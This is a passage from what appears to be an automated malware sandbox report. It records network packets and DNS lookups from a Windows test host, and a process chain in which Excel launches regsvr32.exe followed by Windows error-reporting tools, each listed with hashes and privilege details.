Jan 11, 2021 18:28:00.526820898 CET | 49168 | 443 | 192.168.2.22 | 199.59.242.150 |
Jan 11, 2021 18:28:00.527962923 CET | 49169 | 443 | 192.168.2.22 | 199.59.242.150 |
Jan 11, 2021 18:28:00.649553061 CET | 443 | 49168 | 199.59.242.150 | 192.168.2.22 |
Jan 11, 2021 18:28:00.650635004 CET | 443 | 49169 | 199.59.242.150 | 192.168.2.22 |
Jan 11, 2021 18:28:00.650715113 CET | 49169 | 443 | 192.168.2.22 | 199.59.242.150 |
Jan 11, 2021 18:28:00.651102066 CET | 49169 | 443 | 192.168.2.22 | 199.59.242.150 |
Jan 11, 2021 18:28:00.773710012 CET | 443 | 49169 | 199.59.242.150 | 192.168.2.22 |
Jan 11, 2021 18:28:00.773785114 CET | 49169 | 443 | 192.168.2.22 | 199.59.242.150 |
UDP Packets |
---|
Timestamp | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|
Jan 11, 2021 18:27:59.845685959 CET | 52197 | 53 | 192.168.2.22 | 8.8.8.8 |
Jan 11, 2021 18:27:59.992686987 CET | 53 | 52197 | 8.8.8.8 | 192.168.2.22 |
Jan 11, 2021 18:28:36.852425098 CET | 53099 | 53 | 192.168.2.22 | 8.8.8.8 |
Jan 11, 2021 18:28:36.900594950 CET | 53 | 53099 | 8.8.8.8 | 192.168.2.22 |
Jan 11, 2021 18:28:36.939555883 CET | 52838 | 53 | 192.168.2.22 | 8.8.8.8 |
Jan 11, 2021 18:28:36.987488985 CET | 53 | 52838 | 8.8.8.8 | 192.168.2.22 |
Jan 11, 2021 18:28:38.115564108 CET | 61200 | 53 | 192.168.2.22 | 8.8.8.8 |
Jan 11, 2021 18:28:38.163610935 CET | 53 | 61200 | 8.8.8.8 | 192.168.2.22 |
Jan 11, 2021 18:28:38.174900055 CET | 49548 | 53 | 192.168.2.22 | 8.8.8.8 |
Jan 11, 2021 18:28:38.225476980 CET | 53 | 49548 | 8.8.8.8 | 192.168.2.22 |
Jan 11, 2021 18:28:38.506975889 CET | 55627 | 53 | 192.168.2.22 | 8.8.8.8 |
Jan 11, 2021 18:28:38.555064917 CET | 53 | 55627 | 8.8.8.8 | 192.168.2.22 |
Jan 11, 2021 18:28:38.562401056 CET | 56009 | 53 | 192.168.2.22 | 8.8.8.8 |
Jan 11, 2021 18:28:38.610411882 CET | 53 | 56009 | 8.8.8.8 | 192.168.2.22 |
DNS Queries |
---|
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class |
---|---|---|---|---|---|---|---|
Jan 11, 2021 18:27:59.845685959 CET | 192.168.2.22 | 8.8.8.8 | 0x26d4 | Standard query (0) | A (IP address) | IN (0x0001) |
DNS Answers |
---|
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class |
---|---|---|---|---|---|---|---|---|---|
Jan 11, 2021 18:27:59.992686987 CET | 8.8.8.8 | 192.168.2.22 | 0x26d4 | No error (0) | 199.59.242.150 | A (IP address) | IN (0x0001) | ||
Jan 11, 2021 18:28:38.163610935 CET | 8.8.8.8 | 192.168.2.22 | 0xa0c2 | No error (0) | 104.18.10.39 | A (IP address) | IN (0x0001) | ||
Jan 11, 2021 18:28:38.163610935 CET | 8.8.8.8 | 192.168.2.22 | 0xa0c2 | No error (0) | 104.18.11.39 | A (IP address) | IN (0x0001) | ||
Jan 11, 2021 18:28:38.225476980 CET | 8.8.8.8 | 192.168.2.22 | 0x342 | No error (0) | 104.18.11.39 | A (IP address) | IN (0x0001) | ||
Jan 11, 2021 18:28:38.225476980 CET | 8.8.8.8 | 192.168.2.22 | 0x342 | No error (0) | 104.18.10.39 | A (IP address) | IN (0x0001) |
Code Manipulations |
---|
Statistics |
---|
Behavior |
---|
System Behavior |
---|
General |
---|
Start time: | 18:27:41 |
Start date: | 11/01/2021 |
Path: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x13f530000 |
File size: | 27641504 bytes |
MD5 hash: | 5FB0A0F93382ECD19F5F499A5CAA59F0 |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
General |
---|
Start time: | 18:27:48 |
Start date: | 11/01/2021 |
Path: | C:\Windows\System32\regsvr32.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0xffe30000 |
File size: | 19456 bytes |
MD5 hash: | 59BCE9F07985F8A4204F4D6554CFF708 |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
General |
---|
Start time: | 18:28:06 |
Start date: | 11/01/2021 |
Path: | C:\Program Files\Common Files\Microsoft Shared\DW\DW20.EXE |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x13f3f0000 |
File size: | 995024 bytes |
MD5 hash: | 45A078B2967E0797360A2D4434C41DB4 |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | moderate |
General |
---|
Start time: | 18:28:06 |
Start date: | 11/01/2021 |
Path: | C:\Windows\System32\DWWIN.EXE |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0xff840000 |
File size: | 152576 bytes |
MD5 hash: | 25247E3C4E7A7A73BAEEA6C0008952B1 |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | moderate |
Disassembly |
---|
Code Analysis |
---|